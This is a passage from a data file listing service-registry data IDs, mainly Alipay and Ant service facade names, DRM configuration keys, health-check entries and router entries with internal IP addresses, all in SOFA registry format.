acade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@testresaopone#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_11.124.139.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoprod.common.service.facade.equity.EquityInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.workflow.service.facade.callback.ProcessCallback:1.0:quickaccess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipss.service.facade.api.PssService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.merchant.MrchProdClassificationMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecbill.common.service.encash.EncashFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instsign.common.service.facade.instcontract.InstCompatibleContractQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.209.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.exriskcenter.common.service.facade.api.DataFactorCollectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.DomainResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.CommonDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.RoutePluginServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.page.api.PageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csccmng.facade.QcMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_MFUND_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromoprod.common.service.facade.equity.EquityInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.215.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omp.common.service.facade.api.CrowdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.core.service.account.FaInstAccountUserMappingRzoneService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC-pcinstacc-cmd-schedule-serverless@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finlinkdata.common.service.facade.contract.service.InstContractDigestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.afsc.common.service.assistinvestigate.core.RequireAddServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ck:name=com.alipay.zdal.config.groupCluster.cfpcenter_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:minicenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.securityidentify.EworkCardUsableInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.lucky.api.LuckyBagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.148.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rinsight.biz.customized.spi.ModelInfoSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.70.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditbatch.service.MYBKPermitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PcreditFreeCardTemplateDrm.supportBillInstallNums,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","antdsm@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.124.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.220.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.test.SimpleService-19#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finstore.common.service.facade.fop.api.FinTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.video.VideoSceneConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.common.manage.facade.api.template.ElementDefinitionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.MerchantLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:riskmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.service.SelfCureDecisionFacade:1.0:trsbrainCureDecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insleads.common.service.facade.customer.CustomerFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@libracore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.assettrans.core.service.drm.AstcSysParaUpdateDrmResourceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.UserActivityParticipateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebill.common.service.facade.contact.ContactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.elf.facade.console.conf.DomainConfManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.FinpromoGoalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialscpower.common.facade.SocialSCPowerDrivenQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.IaaSAccountServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.livetradeprod.service.facade.api.ClientInvokeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imawalletbizprod.common.facade.api.AccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbcmng.immunemng.facade.ImmAllSolutionFacade:1.0:inscheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.ReceiveGotoneSmsService:1.0:morderprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.OpenCertifyActionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.tinyAppAvailableBooths,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbtestcenter.knowman.common.service.facade.DisCampAndVccQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.aboss.common.service.facade.GenericTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:icardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ordermng_rewardRelationAdjustProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.gov.common.facade.tdm.api.TdmIdentityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_INSMOBILE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bbccore.facade.bizscene.BizSceneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.dispatch.DispatchTicketQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.redeem.facade.RepaymentPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.smartcacheUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-fploanmng-task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insclaimdecision.common.service.InsDecisionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.template.api.MerchantTemplateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.ms.service.SofaCircuitBreakerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue41#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.176.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:BKPAYBOSS_BKMNG_AUDIT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.DiscountAccessControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.OrderDisburseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.UcaMigrateDrm.enableSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.bizprod.common.service.facade.api.VerificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.spi.EbppOrderItemSpi$PreCreateItemProcessor:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financingcore.financing.facade.api.FinancingFinGainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.CapitalAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tscenter.common.service.facade.UmidQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrenewprod.common.service.facade.api.continuous.InsContinuousAcceptanceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igopcore.common.service.facade.IgopcoreApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.mtconfig.service.TaskConfigService:1.0:mngTaskConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omoaidbase.common.service.facade.videocall.VerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.SpiQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.25.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_APPSTORE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.baoxianprod.common.facade.InsureOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:admediamgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.thor.service.ThorMediumTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.sysparam.SystemParameterService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.jiaofei.CommunityOperateLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:static-server@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthprod.shared.pcptransfer.cumulative.CumulativeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.servicegovern.common.service.facade.ServiceGovernQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.register.MerchantApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.trade.impl.XTradeParamDrmImpl.applyModel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bketensip_process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_DEPOSIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_BAOXIANVALUE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.membertangram.common.service.facade.config.ConfigSimpleService:1.0:taskConfigSimpleService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AuthorizationBizEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_guaranteeMerchantService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.amcs.ConfigurationKeyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.task.TaskScheduleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.financing.service.facade.FinancingAssetQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.25.255#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.masterdata.common.service.facade.MasterDataOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.aciamcore:name=cn.com.antcloud.common.auth.client.config.AntPersonalDrmConfigTrigger.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:isdsp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.query.YebcPrizeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lendpofprod.common.service.facade.loanapi.support.ArrangementBlacklistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.schedulerweb.service.facade.operate.TaskTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.lifemng.biz.channelmanager.alarm.drm.AlarmCtrlDRM.saveDrmAlarmSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:cashbook@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.paramcore.common.service.manage.facade.api.sync.ParmSyncEnvFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.loancore.common.service.facade.cf.api.query.CfRealtimeInstructionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.ProcessingOrderCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.decision.facade.FdEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegeocoding.common.service.facade.ReverseGeoCodingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditplan.common.prod.merchant.PcreditPlanMerchantBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.FundTradeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zifim:name=com.alipay.fc.common.lang.drm.AntBizMonitorCfgDrm.globalCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdaclouddevice.facade.ha3.MiniAppTransmitHisSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.datacube.ua.service.facade.unified.access.UnifiedAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.rescue.common.service.facade.PlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.biz.service.facade.inner.api.BBTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.updateProductAlibityEle,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.workflow.WorkflowProblemUpgradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.antqRatio_TP_SECURITYDATA_SYNC_TO_C,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.service.facade.api.datasync.NewsIndexManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerc.common.service.facade.glaucus.GlaucusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.tairOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findtprod:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zpaas.zappinfo.facade.query.ConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.service.facade.resourceitem.SiteAccountRIManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_SOCIALCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:communicate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.IguideUmDataAppService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.common.sdk.open.service.schema.OntologyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.pipeline.common.facade.core.datax.DataXOpenService:1.0:dataphin-pipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.166.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:bizfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.AttachmentFacade:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.shop.admin.ShopQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.charge:name=com.alipay.xview.core.common.drm.CacheConsistSwitch.readConsistDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.160.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iinnertrans.facade.api.InnerAccountingMsgRecoverQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.api.PcreditAccountManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.183.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductQueryStdFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:cfmng-taskcenterCallBackServiceUniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.ProdTopicFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.ProductGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.acbsbcore.common.service.rest.BsbCallerRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pushcore.facade.PushDeviceManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.partner.LimitCardPartnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:isales_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@testresaopclient#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Pub_Servers_TP_S_CHECK_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.transferprod.common.service.facade.api.RealNameCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.????#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.cryptprod.common.service.facade.CipherKeyQueryFacade:1.0:@fccryptprod_service_unique_id@#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.openCampAlert,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zim.service.mobile.api.ZimDispatchService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:kbSignFcprocessAuditComplete@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_dceptrans_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergwext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrepaycenter.common.service.facade.ProposalOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.inspect.service.MstDetectDataConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.accountgold.CommoditiesTransferOrderOperateShadowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_IECPPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kgmng.common.service.facade.ontology.NoumenonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.event.ArEventQueryFacade:1.0:zhiMaArEventQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.event.common.service.facade.api.eventbusversion.EventBusVersionOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.match.repository.impl.MatchAppointmentAggrModelRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue1:d#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paymentmng.service.facade.limit.ProdtransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:adtask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.project.ProjectService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.xb.XbCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.mservicesinspect_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.service.inspect.tinyapp.TinyAppUsabilityProcess:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.common.service.falcon.facade.api.NorthCapitalFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-pcardcore-Scheduler-Dispatch#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.checkroute.common.service.trigger.HAErrorCodeQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdsds.common.service.facade.umid.DwdsdsUmidService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.echox.drm.EchoRecordConfigDrm.recordSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.auth_center.common.service.facade.res.ManagedRoleService:1.0:internal@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.money.core.LmbMoneyFlowTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graymng.common.service.facade.api.whitelist.GrayWhitelistFacade:1.0@DEFAULT#@#DEFAULT_INSTANC